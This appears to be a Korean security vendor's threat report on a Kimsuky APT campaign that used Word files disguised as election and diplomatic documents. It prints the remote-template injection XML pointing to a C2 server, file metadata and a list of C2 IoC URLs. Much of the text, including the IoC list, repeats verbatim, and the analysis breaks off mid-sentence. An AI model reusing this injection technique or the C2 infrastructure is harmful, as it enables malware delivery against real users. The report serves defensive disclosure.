김수키(Kimsuky)조직, 21대 국회의원 선거문서로 사칭한 스모크 스크린 APT 공격 수행
Contents
안녕하세요. 이스트시큐리티 ESRC(시큐리티 대응센터)입니다.
김수키(Kimsuky) 조직의 '스모크 스크린' 캠페인의 일환으로 추정되는 공격이 또 한번 포착되어 사용자들의 주의가 필요합니다.
이번 공격에 사용된 악성 파일은 '21대 국회의원 선거 관련.docx', '외교문서 관련(이재춘국장).docx' 파일을 위장하고 있습니다.
이번에 발견된 두 개의 악성 워드파일들의 파일명은 다르지만, 동작방식은 동일합니다.
먼저 악성 DOCX 문서가 실행되면, 아래와 같은 내부 'settings.xml.rels' 명령이 작동하고, 악성 매크로 함수실행을 위해 특정 미리네 호스팅 C2 서버로 통신을 시도합니다.
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://saemaeul[.]mireene.com/skin/board/basic/bin" TargetMode="External"/>
</Relationships>
DOCX 문서 파일의 작성자는 'seong jin lee' 이름이 등록되어 있으며, 마지막 수정자는 'Robot Karll' 입니다.
<dc:creator>seong jin lee</dc:creator>
<cp:keywords/>
<dc:description/>
<cp:lastModifiedBy>Robot Karll</cp:lastModifiedBy>
<cp:revision>6</cp:revision>
<cp:lastPrinted>2020-04-01T07:10:00Z</cp:lastPrinted>
<dcterms:created xsi:type="dcterms:W3CDTF">2020-04-01T06:01:00Z</dcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-03T00:14:00Z</dcterms:modified>
</cp:coreProperties>
그리고 다음과 같이 [콘텐츠 사용] 버튼 클릭을 유도하는 문구를 보여줍니다. 만약 C2 서버와 통신이 실패하면 [콘텐츠 사용] 버튼은 나타나지 않습니다.
[그림 1] C2 서버 'saemaeul.mireene[.]com 서버와 통신해 매크로 실행 유도하는 과정
사용자가 [콘텐츠 사용] 버튼을 클릭해 실행하면, 사용자에게는 다음과 같은 워드문서의 내용이 보이게 됩니다.
[그림 2] 21대 국회의원 선거 관련 내용이 담긴 악성 문서 화면
[그림 3] 외교 및 총선 관련 내용이 담긴 악성 문서 화면
악성 매크로가 실행되면, …
김수키(Kimsuky) 조직의 '스모크 스크린' 캠페인의 일환으로 추정되는 공격이 또 한번 포착되어 사용자들의 주의가 필요합니다.
이번 공격에 사용된 악성 파일은 '21대 국회의원 선거 관련.docx', '외교문서 관련(이재춘국장).docx' 파일을 위장하고 있습니다.
이번에 발견된 두 개의 악성 워드파일들의 파일명은 다르지만, 동작방식은 동일합니다.
먼저 악성 DOCX 문서가 실행되면, 아래와 같은 내부 'settings.xml.rels' 명령이 작동하고, 악성 매크로 함수실행을 위해 특정 미리네 호스팅 C2 서버로 통신을 시도합니다.
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://saemaeul[.]mireene.com/skin/board/basic/bin" TargetMode="External"/>
</Relationships>
DOCX 문서 파일의 작성자는 'seong jin lee' 이름이 등록되어 있으며, 마지막 수정자는 'Robot Karll' 입니다.
<dc:creator>seong jin lee</dc:creator>
<cp:keywords/>
<dc:description/>
<cp:lastModifiedBy>Robot Karll</cp:lastModifiedBy>
<cp:revision>6</cp:revision>
<cp:lastPrinted>2020-04-01T07:10:00Z</cp:lastPrinted>
<dcterms:created xsi:type="dcterms:W3CDTF">2020-04-01T06:01:00Z</dcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-03T00:14:00Z</dcterms:modified>
</cp:coreProperties>
그리고 다음과 같이 [콘텐츠 사용] 버튼 클릭을 유도하는 문구를 보여줍니다. 만약 C2 서버와 통신이 실패하면 [콘텐츠 사용] 버튼은 나타나지 않습니다.
[그림 1] C2 서버 'saemaeul.mireene[.]com 서버와 통신해 매크로 실행 유도하는 과정
사용자가 [콘텐츠 사용] 버튼을 클릭해 실행하면, 사용자에게는 다음과 같은 워드문서의 내용이 보이게 됩니다.
[그림 2] 21대 국회의원 선거 관련 내용이 담긴 악성 문서 화면
[그림 3] 외교 및 총선 관련 내용이 담긴 악성 문서 화면
악성 매크로가 실행되면, …
IoC
http://saemaeul.mireene.com
http://saemaeul.mireene.com/skin/board/basic/bin
http://saemaeul.mireene.com/skin/board/basic/bin/down.php?op=1
http://saemaeul.mireene.com/skin/board/basic/bin/down.php?op=2
http://saemaeul.mireene.com/skin/board/basic/bin/report.php
http://saemaeul.mireene.com/skin/visit/basic/log
http://saemaeul.mireene.com/skin/visit/basic/log/down.php?op=1
http://saemaeul.mireene.com/skin/visit/basic/log/down.php?op=2
http://saemaeul.mireene.com/skin/visit/basic/log/report.php
http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate
http://schemas.openxmlformats.org/package/2006/relationships
http://saemaeul.mireene.com/skin/board/basic/bin
http://saemaeul.mireene.com/skin/board/basic/bin/down.php?op=1
http://saemaeul.mireene.com/skin/board/basic/bin/down.php?op=2
http://saemaeul.mireene.com/skin/board/basic/bin/report.php
http://saemaeul.mireene.com/skin/visit/basic/log
http://saemaeul.mireene.com/skin/visit/basic/log/down.php?op=1
http://saemaeul.mireene.com/skin/visit/basic/log/down.php?op=2
http://saemaeul.mireene.com/skin/visit/basic/log/report.php
http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate
http://schemas.openxmlformats.org/package/2006/relationships